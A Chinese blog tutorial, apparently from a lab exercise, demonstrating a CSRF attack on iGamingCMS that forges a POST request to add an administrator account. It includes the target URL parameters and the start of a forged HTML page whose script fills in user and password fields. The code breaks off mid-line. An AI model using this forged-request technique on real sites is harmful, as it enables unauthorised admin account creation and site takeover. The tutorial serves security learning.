iGamingCMS CSRF漏洞伪造POST添加管理员

正常打开页面:http://192.168.209.137/CSRF0/admin/users.php?do=add_user
在这里插入图片描述
这个网页使用request来接受信息的,所以可以接收GET也可以接收POST,通过burp抓提交的数据包得。
在这里插入图片描述
可以看到后面有一个do参数为add_confirm和我们之前的写表单的网址http://192.168.209.137/CSRF0/admin/users.php?do=add_user有相同的参数。那么说明提交的时候是在do=add_confirm里进行的,get方式直接拼接url即可。接下来构造POST请求。

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF</title>
	<script>
	function abc(){
		var f=document.getElementById("test");
		f.getElementsByTagName("input")[0].value="user";
		f.getElementsByTagName("input")[1].value="pass";
		f.getElementsByTagName("input")[2].value="user";
		f.getElementsByTagName("input")[3].val
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值